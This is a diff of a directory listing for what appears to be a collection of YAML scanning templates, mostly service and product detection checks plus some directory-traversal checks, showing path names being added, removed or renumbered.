+./poc/detect/detect-options-method-6977.yaml
./poc/detect/detect-options-method.yaml
./poc/detect/detect-rsyncd-6979.yaml
./poc/detect/detect-rsyncd-6980.yaml
@@ -44215,6 +44190,7 @@
./poc/detect/django-debug-detect-7027.yaml
./poc/detect/django-debug-detect.yaml
./poc/detect/dns-saas-service-detection.yaml
+./poc/detect/dns-waf-detect-7052.yaml
./poc/detect/dns-waf-detect-7053.yaml
./poc/detect/dns-waf-detect-7054.yaml
./poc/detect/dns-waf-detect.yaml
@@ -44228,17 +44204,20 @@
./poc/detect/dotclear-detect.yaml
./poc/detect/dotcms-version-detect.yaml
./poc/detect/dotnet-remoting-service-detect.yaml
-./poc/detect/druid-detect-7098.yaml
./poc/detect/druid-detect-7099.yaml
./poc/detect/druid-detect.yaml
+./poc/detect/dwr-index-detect-7135.yaml
./poc/detect/dwr-index-detect-7136.yaml
+./poc/detect/dwr-index-detect.yaml
./poc/detect/eaton-power-manager-detect.yaml
./poc/detect/ec2-detection-7161.yaml
-./poc/detect/ec2-detection-7162.yaml
+./poc/detect/ec2-detection-7163.yaml
./poc/detect/eg-manager-detect-7182.yaml
./poc/detect/eg-manager-detect-7184.yaml
+./poc/detect/eg-manager-detect.yaml
./poc/detect/elasticpot-honeypot-detection.yaml
./poc/detect/elasticsearch-sql-client-detect-7189.yaml
+./poc/detect/elasticsearch-sql-client-detect-7190.yaml
./poc/detect/elasticsearch-sql-client-detect-7191.yaml
./poc/detect/elasticsearch-sql-client-detect-7192.yaml
./poc/detect/electron-version-detect.yaml
@@ -44250,6 +44229,7 @@
./poc/detect/ems-webclient-detect.yaml
./poc/detect/epson-access-detect-7233.yaml
./poc/detect/epson-access-detect-7234.yaml
+./poc/detect/epson-access-detect-7235.yaml
./poc/detect/epson-access-detect-7236.yaml
./poc/detect/epson-access-detect-7237.yaml
./poc/detect/epson-access-detect.yaml
@@ -44269,8 +44249,9 @@
./poc/detect/fanruanoa-detect-1.yaml
./poc/detect/fanruanoa-detect-2.yaml
./poc/detect/fanruanoa-detect-7391.yaml
+./poc/detect/fanruanoa-detect-7392.yaml
./poc/detect/fanruanoa2012-detect-7387.yaml
-./poc/detect/fanruanoa2012-detect.yaml
+./poc/detect/fanruanoa2012-detect-7388.yaml
./poc/detect/fatpipe-mpvpn-detect-7437.yaml
./poc/detect/fatpipe-mpvpn-detect-7438.yaml
./poc/detect/fatpipe-mpvpn-detect.yaml
@@ -44278,7 +44259,6 @@
./poc/detect/fatpipe-warp-detect-7440.yaml
./poc/detect/fatpipe-warp-detect.yaml
./poc/detect/favicon-detect.yaml
-./poc/detect/favicon-detection-7441.yaml
./poc/detect/favicon-detection-7442.yaml
./poc/detect/favicon-detection-7443.yaml
./poc/detect/favicon-detection-7445.yaml
@@ -44301,6 +44281,7 @@
./poc/detect/fortinet-detect.yaml
./poc/detect/froxlor-detect-7551.yaml
./poc/detect/froxlor-detect-7552.yaml
+./poc/detect/froxlor-detect-7553.yaml
./poc/detect/froxlor-detect-7554.yaml
./poc/detect/fuji-xerox-printer-detect.yaml
./poc/detect/gaspot-honeypot-detect.yaml
@@ -44308,6 +44289,7 @@
./poc/detect/geowebserver-detector.yaml
./poc/detect/gerapy-detect.yaml
./poc/detect/gespage-detect-7602.yaml
+./poc/detect/gespage-detect-7603.yaml
./poc/detect/gespage-detect.yaml
./poc/detect/getsimple-cms-detect-1.yaml
./poc/detect/getsimple-cms-detect-2.yaml
@@ -44326,6 +44308,7 @@
./poc/detect/gitea-detect.yaml
./poc/detect/github-enterprise-detect-7647.yaml
./poc/detect/github-enterprise-detect-7648.yaml
+./poc/detect/github-enterprise-detect-7649.yaml
./poc/detect/github-enterprise-detect-7650.yaml
./poc/detect/github-enterprise-detect-7651.yaml
./poc/detect/github-enterprise-detect.yaml
@@ -44353,14 +44336,13 @@
./poc/detect/grafana-detect-7805.yaml
./poc/detect/grafana-detect-7806.yaml
./poc/detect/grafana-detect-7807.yaml
-./poc/detect/grafana-detect-7808.yaml
./poc/detect/grafana-detect.yaml
./poc/detect/graphite-browser-detect.yaml
./poc/detect/graphql-apiforwp-detect.yaml
./poc/detect/graphql-apollo-detect.yaml
./poc/detect/graphql-ariadne-detect.yaml
./poc/detect/graphql-detect-7829.yaml
-./poc/detect/graphql-detect-7831.yaml
+./poc/detect/graphql-detect-7830.yaml
./poc/detect/graphql-detect-7832.yaml
./poc/detect/graphql-detect.yaml
./poc/detect/graphql-dianajl-detect.yaml
@@ -44381,43 +44363,39 @@
./poc/detect/grav-cms-detect-7841.yaml
./poc/detect/grav-cms-detect-7842.yaml
./poc/detect/grav-cms-detect-7845.yaml
-./poc/detect/grav-cms-detect.yaml
-./poc/detect/gunicorn-detect-7862.yaml
./poc/detect/gunicorn-detect-7863.yaml
./poc/detect/gunicorn-detect-7864.yaml
./poc/detect/gunicorn-detect-7865.yaml
./poc/detect/hanwang-detect-7881.yaml
./poc/detect/hanwang-detect-7882.yaml
-./poc/detect/harbor-detect-7886.yaml
./poc/detect/harbor-detect-7887.yaml
./poc/detect/harbor-detect-7888.yaml
./poc/detect/harbor-detect.yaml
./poc/detect/hash-detection.yaml
-./poc/detect/herokuapp-detect-7937.yaml
./poc/detect/herokuapp-detect-7938.yaml
-./poc/detect/herokuapp-detect-7939.yaml
./poc/detect/herokuapp-detect-7940.yaml
./poc/detect/herokuapp-detect.yaml
./poc/detect/hikvision-detect.yaml
./poc/detect/hikvision-detection-1.yaml
./poc/detect/hikvision-detection-2.yaml
+./poc/detect/hikvision-detection-7954.yaml
+./poc/detect/hikvision-detection-7955.yaml
./poc/detect/hikvision-detection.yaml
./poc/detect/home-assistant-detect.yaml
./poc/detect/hp-blade-admin-detect-8003.yaml
-./poc/detect/hp-blade-admin-detect-8004.yaml
./poc/detect/hp-blade-admin-detect-8005.yaml
./poc/detect/hp-color-laserjet-detect.yaml
./poc/detect/hp-device-info-detect-8007.yaml
./poc/detect/hp-device-info-detect-8008.yaml
-./poc/detect/hp-device-info-detect-8010.yaml
+./poc/detect/hp-device-info-detect-8009.yaml
./poc/detect/hp-device-info-detect.yaml
./poc/detect/hp-laserjet-detect-8026.yaml
./poc/detect/hp-laserjet-detect-8027.yaml
./poc/detect/hp-laserjet-detect-8028.yaml
./poc/detect/hp-media-vault-detect-8029.yaml
-./poc/detect/hp-media-vault-detect-8030.yaml
./poc/detect/hp-media-vault-detect-8031.yaml
./poc/detect/htpasswd-detection-8045.yaml
+./poc/detect/htpasswd-detection-8046.yaml
./poc/detect/htpasswd-detection.yaml
./poc/detect/httpbin-detection.yaml
./poc/detect/httpbin-detection.yml
@@ -44447,17 +44425,15 @@
./poc/detect/istat-panel-detect.yaml
./poc/detect/itop-detect-8201.yaml
./poc/detect/itop-detect-8202.yaml
-./poc/detect/itop-detect-8203.yaml
./poc/detect/itop-detect.yaml
./poc/detect/jaspersoft-detect-8219.yaml
-./poc/detect/jaspersoft-detect-8220.yaml
./poc/detect/jaspersoft-detect.yaml
+./poc/detect/java-rmi-detect-8227.yaml
./poc/detect/java-rmi-detect-8228.yaml
./poc/detect/java-rmi-detect.yaml
./poc/detect/javamelody-detect.yaml
-./poc/detect/jboss-detect.yaml
+./poc/detect/jboss-detect-8237.yaml
./poc/detect/jeecg-boot-detect-8247.yaml
-./poc/detect/jeecg-boot-detect-8248.yaml
./poc/detect/jeedom-detect-8250.yaml
./poc/detect/jeedom-detect-8251.yaml
./poc/detect/jeedom-detect.yaml
@@ -44466,23 +44442,24 @@
./poc/detect/jellyfin-detect-4.yaml
./poc/detect/jellyfin-detect-8256.yaml
./poc/detect/jellyfin-detect-8257.yaml
-./poc/detect/jellyfin-detect-8258.yaml
+./poc/detect/jellyfin-detect-8259.yaml
./poc/detect/jellyfin-detect-8260.yaml
+./poc/detect/jellyfin-detect.yaml
./poc/detect/jenkins-detect-8274.yaml
-./poc/detect/jenkins-detect-8275.yaml
+./poc/detect/jenkins-detect-8276.yaml
./poc/detect/jenkins-detect.yaml
./poc/detect/jenkins-headers-detect.yaml
./poc/detect/jenkins-login-detection.yaml
./poc/detect/jira-detect-1.yaml
./poc/detect/jira-detect-2.yaml
./poc/detect/jira-detect-3.yaml
-./poc/detect/jira-detect-8314.yaml
+./poc/detect/jira-detect-8313.yaml
./poc/detect/jira-detect-8315.yaml
./poc/detect/jira-detect-8316.yaml
./poc/detect/jira-detect.yaml
./poc/detect/js-libraries-detect.yaml
./poc/detect/jsf-detection-8396.yaml
-./poc/detect/jsf-detection-8397.yaml
+./poc/detect/jsf-detection-8398.yaml
./poc/detect/jsf-detection.yaml
./poc/detect/jwt-detection.yaml
./poc/detect/kavita-panel-detect.yaml
@@ -44493,7 +44470,7 @@
./poc/detect/kibana-detect-1.yaml
./poc/detect/kibana-detect-2.yaml
./poc/detect/kibana-detect-3.yaml
-./poc/detect/kibana-detect-8484.yaml
+./poc/detect/kibana-detect-8483.yaml
./poc/detect/kibana-detect.yaml
./poc/detect/kong-detect-8498.yaml
./poc/detect/kong-detect-8499.yaml
@@ -44520,7 +44497,9 @@
./poc/detect/linkerd-badrule-detect-8630.yaml
./poc/detect/linkerd-badrule-detect-8631.yaml
./poc/detect/linkerd-badrule-detect.yaml
-./poc/detect/linkerd-detect-8632.yaml
+./poc/detect/linkerd-detect-8633.yaml
+./poc/detect/linkerd-detect.yaml
+./poc/detect/linkerd-service-detect-8634.yaml
./poc/detect/linkerd-service-detect-8635.yaml
./poc/detect/linkerd-service-detect.yaml
./poc/detect/linkerd-ssrf-detect-8636.yaml
@@ -44544,13 +44523,14 @@
./poc/detect/magento-detect-8706.yaml
./poc/detect/magento-detect-8707.yaml
./poc/detect/magmi-detect-8714.yaml
-./poc/detect/magmi-detect-8715.yaml
+./poc/detect/magmi-detect-8716.yaml
./poc/detect/magmi-detect-8717.yaml
./poc/detect/mahara-version-detect.yaml
./poc/detect/maian-cart-detect-8718.yaml
-./poc/detect/maian-cart-detect-8719.yaml
+./poc/detect/maian-cart-detect.yaml
./poc/detect/mailoney-honeypot-detect.yaml
./poc/detect/mailoney-honeypot-detection.yaml
+./poc/detect/mantis-detect-8780.yaml
./poc/detect/mantis-detect-8781.yaml
./poc/detect/mantis-detect.yaml
./poc/detect/mautic-crm-detect-8787.yaml
@@ -44560,12 +44540,13 @@
./poc/detect/mediawiki-version-detect.yaml
./poc/detect/megarac-sp-ui-detect.yaml
./poc/detect/meilisearch-detect.yaml
-./poc/detect/metabase-detect-8804.yaml
./poc/detect/metabase-detect-8805.yaml
./poc/detect/metabase-detect.yaml
./poc/detect/mfiles-web-detect.yaml
./poc/detect/microsoft-echange-server-detect.yaml
./poc/detect/microsoft-exchange-server-detect-8852.yaml
+./poc/detect/microsoft-exchange-server-detect-8853.yaml
+./poc/detect/microsoft-exchange-server-detect-8854.yaml
./poc/detect/microsoft-exchange-server-detect.yaml
./poc/detect/microsoft-ftp-service-detect.yaml
./poc/detect/microstrategy-detect-1.yaml
@@ -44598,23 +44579,25 @@
./poc/detect/mitel-panel-detect.yaml
./poc/detect/mobileiron-version-detect.yaml
./poc/detect/moinmoin-detect-8915.yaml
+./poc/detect/moinmoin-detect-8916.yaml
./poc/detect/moinmoin-detect-8917.yaml
./poc/detect/moinmoin-detect-8918.yaml
./poc/detect/moinmoin-detect.yaml
./poc/detect/mongodb-detect-8919.yaml
+./poc/detect/mongodb-detect-8920.yaml
./poc/detect/mongodb-detect-8921.yaml
./poc/detect/mongodb-detect.yaml
./poc/detect/monstracms-detect.yaml
./poc/detect/moodle-version-detect.yaml
+./poc/detect/moveit-detect.yaml
./poc/detect/moveit-sftp-detect.yaml
-./poc/detect/moveit-transfer-detect.yaml
./poc/detect/mrtg-detect-1.yaml
./poc/detect/mrtg-detect-2.yaml
./poc/detect/mrtg-detect-3.yaml
./poc/detect/mrtg-detect-8958.yaml
./poc/detect/mrtg-detect-8959.yaml
./poc/detect/mrtg-detect.yaml
-./poc/detect/ms-adcs-detect-8960.yaml
+./poc/detect/ms-adcs-detect-8961.yaml
./poc/detect/ms-adcs-detect.yaml
./poc/detect/ms-sql-detect.yaml
./poc/detect/msmq-detect.yaml
@@ -44627,6 +44610,7 @@
./poc/detect/nacos-detect.yaml
./poc/detect/nameserver-detection.yaml
./poc/detect/neos-detect-9013.yaml
+./poc/detect/neos-detect.yaml
./poc/detect/nessus-detect.yaml
./poc/detect/netdata-dashboard-detected-9022.yaml
./poc/detect/netdata-dashboard-detected.yaml
@@ -44642,6 +44626,7 @@
./poc/detect/nextcloud-detect-1.yaml
./poc/detect/nextcloud-detect-2.yaml
./poc/detect/nextcloud-detect-3.yaml
+./poc/detect/nextcloud-detect-9079.yaml
./poc/detect/nextcloud-detect-9080.yaml
./poc/detect/nextcloud-detect-9081.yaml
./poc/detect/nextcloud-owncloud-detect.yaml
@@ -44655,27 +44640,27 @@
./poc/detect/node-red-detect-9138.yaml
./poc/detect/node-red-detect.yaml
./poc/detect/oauth2-detect-9180.yaml
-./poc/detect/oauth2-detect-9181.yaml
./poc/detect/oauth2-detect-9182.yaml
./poc/detect/oauth2-detect-9183.yaml
./poc/detect/octobercms-detect-1.yaml
./poc/detect/octobercms-detect-2.yaml
./poc/detect/octobercms-detect-9194.yaml
-./poc/detect/octobercms-detect-9195.yaml
./poc/detect/octobercms-detect-9196.yaml
./poc/detect/oidc-detect-9216.yaml
./poc/detect/oidc-detect-9218.yaml
+./poc/detect/oidc-detect.yaml
+./poc/detect/oipm-detect-9219.yaml
./poc/detect/oipm-detect-9220.yaml
./poc/detect/oipm-detect-9221.yaml
-./poc/detect/oipm-detect-9222.yaml
./poc/detect/oipm-detect.yaml
./poc/detect/olivetti-crf-detect-9242.yaml
./poc/detect/olivetti-crf-detect-9243.yaml
-./poc/detect/olivetti-crf-detect-9244.yaml
./poc/detect/oneblog-detect-9245.yaml
+./poc/detect/oneblog-detect-9246.yaml
./poc/detect/oneblog-detect-9247.yaml
./poc/detect/open-virtualization-manager-detect-9325.yaml
./poc/detect/open-virtualization-manager-detect-9326.yaml
+./poc/detect/open-virtualization-manager-detect.yaml
./poc/detect/openam-detect.yaml
./poc/detect/openam-detection-1.yaml
./poc/detect/openam-detection-10.yaml
@@ -44699,14 +44684,13 @@
./poc/detect/opencast-detect-9263.yaml
./poc/detect/opencast-detect-9264.yaml
./poc/detect/opencast-detect-9266.yaml
-./poc/detect/openemr-detect-9271.yaml
./poc/detect/openemr-detect-9272.yaml
./poc/detect/openemr-detect-9273.yaml
+./poc/detect/openemr-detect-9274.yaml
./poc/detect/openemr-detect.yaml
./poc/detect/opengear-detect.yaml
./poc/detect/opensis-detect-1.yaml
./poc/detect/opensis-detect-2.yaml
-./poc/detect/opensis-detect-9313.yaml
./poc/detect/opensis-detect.yaml
./poc/detect/openssh-detect.yaml
./poc/detect/openssh-detect.yml
@@ -44716,45 +44700,42 @@
./poc/detect/openx-detect.yaml
./poc/detect/oracle-dbass-detect-9349.yaml
./poc/detect/oracle-dbass-detect-9350.yaml
-./poc/detect/oracle-dbass-detect-9351.yaml
-./poc/detect/oracle-dbass-detect.yaml
./poc/detect/owasp-juice-shop-detected-9414.yaml
./poc/detect/owasp-juice-shop-detected-9415.yaml
+./poc/detect/owasp-juice-shop-detected-9416.yaml
./poc/detect/owasp-juice-shop-detected-9417.yaml
-./poc/detect/owasp-juice-shop-detected-9418.yaml
+./poc/detect/owasp-juice-shop-detected.yaml
./poc/detect/panel-detect.yaml
./poc/detect/parallels-hsphere-detect.yaml
./poc/detect/pega-detect-9473.yaml
./poc/detect/pega-detect-9474.yaml
./poc/detect/pega-detect-9475.yaml
./poc/detect/pega-detect-9476.yaml
-./poc/detect/pega-detect.yaml
./poc/detect/pexip-detect.yaml
./poc/detect/pgsql-detect.yaml
./poc/detect/pgsql-version-detect.yaml
./poc/detect/php-proxy-detect-1.yaml
./poc/detect/php-proxy-detect-2.yaml
./poc/detect/php-proxy-detect-9544.yaml
-./poc/detect/php-proxy-detect.yaml
+./poc/detect/phpcollab-detect-9499.yaml
./poc/detect/phpcollab-detect-9500.yaml
./poc/detect/phpcollab-detect.yaml
./poc/detect/phpmyadmin-version-detect.yaml
./poc/detect/phpmyadmin-version-detection.yaml
./poc/detect/pi-hole-detect-9580.yaml
-./poc/detect/pi-hole-detect-9581.yaml
+./poc/detect/pi-hole-detect-9582.yaml
./poc/detect/pi-hole-detect-9583.yaml
./poc/detect/pi-hole-detect.yaml
./poc/detect/piwigo-detect.yaml
./poc/detect/plone-cms-detect-9605.yaml
./poc/detect/plone-cms-detect-9606.yaml
-./poc/detect/plone-cms-detect-9607.yaml
+./poc/detect/plone-cms-detect-9608.yaml
./poc/detect/plone-cms-detect-9609.yaml
-./poc/detect/plone-cms-detect.yaml
./poc/detect/polycom-admin-detect-9624.yaml
./poc/detect/polycom-admin-detect.yaml
./poc/detect/pop3-detect.yaml
./poc/detect/ppdetect.yaml
-./poc/detect/prestashop-detect.yaml
+./poc/detect/prestashop-detect-9651.yaml
./poc/detect/privatebin-detect.yaml
./poc/detect/proftpd-server-detect.yaml
./poc/detect/programming-language-detect.yaml
@@ -44767,16 +44748,14 @@
./poc/detect/prtg-detect-9703.yaml
./poc/detect/prtg-detect-9704.yaml
./poc/detect/prtg-detect-9705.yaml
-./poc/detect/prtg-detect-9706.yaml
./poc/detect/prtg-detect.yaml
./poc/detect/prtg-version-detect.yaml
./poc/detect/pulse-secure-version-detect.yaml
-./poc/detect/puppet-node-manager-detect-9720.yaml
+./poc/detect/puppet-node-manager-detect.yaml
./poc/detect/puppetdb-detect-9717.yaml
./poc/detect/puppetdb-detect-9718.yaml
./poc/detect/puppetdb-detect-9719.yaml
./poc/detect/puppetserver-detect-9721.yaml
-./poc/detect/puppetserver-detect-9722.yaml
./poc/detect/puppetserver-detect-9723.yaml
./poc/detect/qnap_nas_detect.yaml
./poc/detect/quantum-scalar-detect.yaml
@@ -44797,6 +44776,7 @@
./poc/detect/redis-honeypot-detection.yaml
./poc/detect/redmine-cli-detect-9852.yaml
./poc/detect/redmine-cli-detect-9853.yaml
+./poc/detect/redmine-cli-detect-9854.yaml
./poc/detect/redmine-cli-detect-9855.yaml
./poc/detect/redmine-cli-detect-9856.yaml
./poc/detect/redmine-cli-detect.yaml
@@ -44811,14 +44791,15 @@
./poc/detect/reverse-proxy-detect.yaml
./poc/detect/rhymix-cms-detect-9876.yaml
./poc/detect/rhymix-cms-detect-9877.yaml
+./poc/detect/rhymix-cms-detect-9878.yaml
./poc/detect/rhymix-cms-detect-9879.yaml
./poc/detect/riak-detect.yaml
./poc/detect/room-alert-detect.yaml
./poc/detect/routeros-version-detect.yaml
./poc/detect/rpcbind-portmapper-detect.yaml
-./poc/detect/rseenet-detect-9916.yaml
-./poc/detect/rstudio-detect-9917.yaml
+./poc/detect/rseenet-detect.yaml
./poc/detect/rstudio-detect-9918.yaml
+./poc/detect/rstudio-detect-9919.yaml
./poc/detect/rstudio-detect.yaml
./poc/detect/rsyncd-service-detect.yaml
./poc/detect/rtsp-detect.yaml
@@ -44847,37 +44828,35 @@
./poc/detect/sap-netweaver-detect-10043.yaml
./poc/detect/sap-netweaver-detect-10044.yaml
./poc/detect/sap-netweaver-detect-10046.yaml
-./poc/detect/sap-netweaver-detect-10047.yaml
./poc/detect/sap-netweaver-detect-10048.yaml
./poc/detect/sap-netweaver-detect.yaml
./poc/detect/sap-recon-detect-10062.yaml
-./poc/detect/sap-recon-detect-10063.yaml
./poc/detect/sap-recon-detect.yaml
./poc/detect/sap-successfactors-detect.yaml
./poc/detect/saprouter-detect.yaml
./poc/detect/sceditor-detect-10092.yaml
+./poc/detect/sceditor-detect-10093.yaml
./poc/detect/sceditor-detect-10094.yaml
./poc/detect/schneider-electric-detect.yaml
+./poc/detect/secmail-detect-10109.yaml
./poc/detect/secmail-detect-10110.yaml
./poc/detect/secmail-detect-10111.yaml
-./poc/detect/secmail-detect-10112.yaml
./poc/detect/secmail-detect.yaml
./poc/detect/securityspy-detect-10119.yaml
./poc/detect/securityspy-detect-10120.yaml
./poc/detect/securityspy-detect.yaml
./poc/detect/seeddms-detect-10129.yaml
./poc/detect/seeddms-detect-10130.yaml
+./poc/detect/seeddms-detect-10131.yaml
./poc/detect/seeddms-detect.yaml
./poc/detect/server-backup-manager-se-login-detect.yaml
./poc/detect/shiro-deserialization-detection.yaml
./poc/detect/shiro-detect-10195.yaml
-./poc/detect/shiro-detect-10196.yaml
./poc/detect/shiro-detect-10197.yaml
./poc/detect/shopizer-detect-1.yaml
./poc/detect/shopizer-detect-2.yaml
./poc/detect/shopware-detect-1.yaml
./poc/detect/shopware-detect-10210.yaml
-./poc/detect/shopware-detect-10211.yaml
./poc/detect/shopware-detect-10212.yaml
./poc/detect/shopware-detect-10213.yaml
./poc/detect/shopware-detect-2.yaml
@@ -44887,7 +44866,6 @@
./poc/detect/smartstore-detect-10332.yaml
./poc/detect/smartstore-detect-10333.yaml
./poc/detect/smartstore-detect-10334.yaml
-./poc/detect/smartstore-detect.yaml
./poc/detect/smb-detect.yaml
./poc/detect/smb-os-detect.yaml
./poc/detect/smb-v1-detect.yaml
@@ -44907,7 +44885,7 @@
./poc/detect/solarwinds-whd-version-detect.yaml
./poc/detect/somansa-dlp-detect.yaml
./poc/detect/sonicwall-email-security-detect-10383.yaml
-./poc/detect/sonicwall-email-security-detect.yaml
+./poc/detect/sonicwall-email-security-detect-10384.yaml
./poc/detect/sonicwall-secure-mobile-access-version-detect.yaml
./poc/detect/sophos-fw-version-detect-1.yaml
./poc/detect/sophos-fw-version-detect-10396.yaml
@@ -44936,9 +44914,9 @@
./poc/detect/supermicro-ipmi-ui-detect.yaml
./poc/detect/supermicro-logo-detect.yaml
./poc/detect/symfony-detect.yaml
-./poc/detect/tableau-server-detect.yaml
+./poc/detect/tableau-server-detect-10643.yaml
./poc/detect/teamspeak3-detect.yaml
-./poc/detect/tech-detect-10673.yaml
+./poc/detect/tech-detect-10672.yaml
./poc/detect/tech-detect-10674.yaml
./poc/detect/tech-detect-10675.yaml
./poc/detect/tech-detect-10676.yaml
@@ -44950,7 +44928,7 @@
./poc/detect/telerik-dialoghandler-detect-10.yaml
./poc/detect/telerik-dialoghandler-detect-10687.yaml
./poc/detect/telerik-dialoghandler-detect-10688.yaml
-./poc/detect/telerik-dialoghandler-detect-10690.yaml
+./poc/detect/telerik-dialoghandler-detect-10691.yaml
./poc/detect/telerik-dialoghandler-detect-11.yaml
./poc/detect/telerik-dialoghandler-detect-12.yaml
./poc/detect/telerik-dialoghandler-detect-13.yaml
@@ -44983,9 +44961,11 @@
./poc/detect/tftp-detect.yaml
./poc/detect/thinkcmf-detection-10717.yaml
./poc/detect/thinkcmf-detection-10718.yaml
+./poc/detect/thinkcmf-detection-10719.yaml
./poc/detect/thinkcmf-detection.yaml
./poc/detect/thinkphp-debug-detected.yaml
./poc/detect/thruk-detect.yaml
+./poc/detect/tibco-spotfire-services-detect.yaml
./poc/detect/tingsboard-detect.yaml
./poc/detect/tomcat-detect-10792.yaml
./poc/detect/tomcat-detect-10793.yaml
@@ -45004,7 +44984,7 @@
./poc/detect/tyan-logo-detect.yaml
./poc/detect/tyan-rmm-ui-detect.yaml
./poc/detect/unauthorized-brother-access-detect.yaml
-./poc/detect/unauthorized-puppet-node-manager-detect-10959.yaml
+./poc/detect/unauthorized-puppet-node-manager-detect-10958.yaml
./poc/detect/unauthorized-puppet-node-manager-detect.yaml
./poc/detect/urls-detection.yaml
./poc/detect/vercel-detect.yaml
@@ -45014,7 +44994,7 @@
./poc/detect/versa-flexvnf-server-detect.yaml
./poc/detect/versa-flexvnf-ui-detect.yaml
./poc/detect/virtual-ema-detect-1.yaml
-./poc/detect/virtual-ema-detect-11024.yaml
+./poc/detect/virtual-ema-detect-11025.yaml
./poc/detect/virtual-ema-detect-2.yaml
./poc/detect/virtual-ema-detect.yaml
./poc/detect/vmware-airwatch-version-detect.yaml
@@ -45023,17 +45003,17 @@
./poc/detect/vmware-version-detect-11055.yaml
./poc/detect/vmware-version-detect.yaml
./poc/detect/vmware-vrealize-detect-11056.yaml
-./poc/detect/vmware-vrealize-detect-11057.yaml
./poc/detect/vmware-vrealize-detect-11058.yaml
+./poc/detect/vmware-vrealize-detect.yaml
./poc/detect/vnc-detect-11061.yaml
./poc/detect/vnc-detect.yaml
./poc/detect/vnc-service-detect.yaml
./poc/detect/voipmonitor-detect.yaml
-./poc/detect/vsftpd-detection-11073.yaml
./poc/detect/vsftpd-detection-11074.yaml
+./poc/detect/vsftpd-detection-11075.yaml
./poc/detect/vsftpd-detection-11076.yaml
./poc/detect/vsftpd-detection.yaml
-./poc/detect/waf-detect-11086.yaml
+./poc/detect/waf-detect-11087.yaml
./poc/detect/waf-detect-11088.yaml
./poc/detect/waf-detect-11089.yaml
./poc/detect/waf-detect-11090.yaml
@@ -45045,6 +45025,7 @@
./poc/detect/wamp-xdebug-detect-11101.yaml
./poc/detect/wamp-xdebug-detect-11102.yaml
./poc/detect/wamp-xdebug-detect-11103.yaml
+./poc/detect/wamp-xdebug-detect-11104.yaml
./poc/detect/wamp-xdebug-detect.yaml
./poc/detect/wazuh-detect-11110.yaml
./poc/detect/wazuh-detect.yaml
@@ -45053,11 +45034,10 @@
./poc/detect/weave-scope-dashboard-detect.yaml
./poc/detect/web-framework-detect.yaml
./poc/detect/web-ftp-detect-11135.yaml
-./poc/detect/web-ftp-detect-11136.yaml
./poc/detect/web-ftp-detect-11137.yaml
./poc/detect/web-ftp-detect-11138.yaml
./poc/detect/web-suite-detect-11167.yaml
-./poc/detect/web-suite-detect.yaml
+./poc/detect/web-suite-detect-11168.yaml
./poc/detect/webeditors-check-detect.yaml
./poc/detect/weblogic-bea_wls_internal-detect.yaml
./poc/detect/weblogic-detect-11142.yaml
@@ -45069,7 +45049,7 @@
./poc/detect/weblogic-iiop-detect-11148.yaml
./poc/detect/weblogic-iiop-detect.yaml
./poc/detect/weblogic-t3-detect-11151.yaml
-./poc/detect/weblogic-t3-detect-11152.yaml
+./poc/detect/weblogic-t3-detect-11153.yaml
./poc/detect/weblogic-t3-detect.yaml
./poc/detect/websphere-version-detect.yaml
./poc/detect/werkzeug-debugger-detect-11195.yaml
@@ -45085,12 +45065,11 @@
./poc/detect/widget-detector-elementor.yaml
./poc/detect/wing-ftp-detect.yaml
./poc/detect/wondercms-detect-11221.yaml
+./poc/detect/wondercms-detect-11222.yaml
./poc/detect/wondercms-detect-11223.yaml
-./poc/detect/wondercms-detect.yaml
-./poc/detect/wordpress-detect-11261.yaml
+./poc/detect/wordpress-detect-11260.yaml
./poc/detect/wordpress-detect.yaml
./poc/detect/wordpress-detect2.yaml
-./poc/detect/wordpress-gotmls-detect-11280.yaml
./poc/detect/wordpress-gotmls-detect-11281.yaml
./poc/detect/wordpress-gotmls-detect.yaml
./poc/detect/wordpress-plugins-detect-11296.yaml
@@ -45102,11 +45081,9 @@
./poc/detect/wordpress-themes-detect.yaml
./poc/detect/wordpress-website-detect.yaml
./poc/detect/worksites-detection-11383.yaml
-./poc/detect/worksites-detection-11384.yaml
./poc/detect/worksites-detection-11385.yaml
./poc/detect/worksites-detection-11386.yaml
./poc/detect/workspaceone-uem-airwatch-dashboard-detect.yaml
-./poc/detect/wowza-streaming-detect.yaml
./poc/detect/wp-admin-detect.yaml
./poc/detect/wp-detect.yaml
./poc/detect/wp-mobile-detector-291130449baacf0e6d1046f164f908e9.yaml
@@ -45126,12 +45103,13 @@
./poc/detect/ws_ftp-ssh-detect.yaml
./poc/detect/wsdl-detect.yaml
./poc/detect/wso2-apimanager-detect-11637.yaml
-./poc/detect/wso2-apimanager-detect-11638.yaml
./poc/detect/wso2-apimanager-detect-11639.yaml
./poc/detect/wso2-apimanager-detect.yaml
./poc/detect/wuzhicms-detect-11652.yaml
./poc/detect/wuzhicms-detect-11653.yaml
+./poc/detect/wuzhicms-detect-11654.yaml
./poc/detect/wuzhicms-detect-11655.yaml
+./poc/detect/wuzhicms-detect.yaml
./poc/detect/xlight-ftp-service-detect.yaml
./poc/detect/xml-schema-detect-11692.yaml
./poc/detect/xml-schema-detect.yaml
@@ -45142,13 +45120,14 @@
./poc/detect/yapi-detect-11722.yaml
./poc/detect/yellowfin-bi-version-detect.yaml
./poc/detect/yongyou-nc-beanshell-detect.yaml
+./poc/detect/yourls-detect.yaml
./poc/detect/yzmcms-detect-11751.yaml
./poc/detect/yzmcms-detect-11752.yaml
./poc/detect/yzmcms-detect.yaml
./poc/detect/zabbix-version-detect.yaml
./poc/detect/zebra-printer-detect.yaml
+./poc/detect/zentao-detect-11785.yaml
./poc/detect/zentao-detect-11786.yaml
-./poc/detect/zentao-detect-11787.yaml
./poc/detect/zentao-detect.yaml
./poc/detect/zentral-detection.yaml
./poc/detect/zentral-detection.yml
@@ -45185,11 +45164,10 @@
./poc/directory_listing/ecology-filedownload-directory-traversal.yml
./poc/directory_listing/ecology-jqueryfiletree-directory-traversal.yaml
./poc/directory_listing/ecology-springframework-directory-traversal-7174.yaml
-./poc/directory_listing/ecology-springframework-directory-traversal-7175.yaml
+./poc/directory_listing/ecology-springframework-directory-traversal.yaml
./poc/directory_listing/ecology-springframework-directory-traversal.yml
./poc/directory_listing/ecology-springframework-directoryTraversal.yaml
-./poc/directory_listing/elFinder-path-traversal.yaml
-./poc/directory_listing/elfinder-path-traversal-7203.yaml
+./poc/directory_listing/elfinder-path-traversal.yaml
./poc/directory_listing/erp-nc-directory-traversal-7245.yaml
./poc/directory_listing/erp-nc-directory-traversal-7246.yaml
./poc/directory_listing/erp-nc-directory-traversal-7247.yaml
@@ -45218,12 +45196,11 @@
./poc/directory_listing/kingdee-eas-DirectoryTraversal.yaml
./poc/directory_listing/kingdee-eas-directory-traversal-8488.yaml
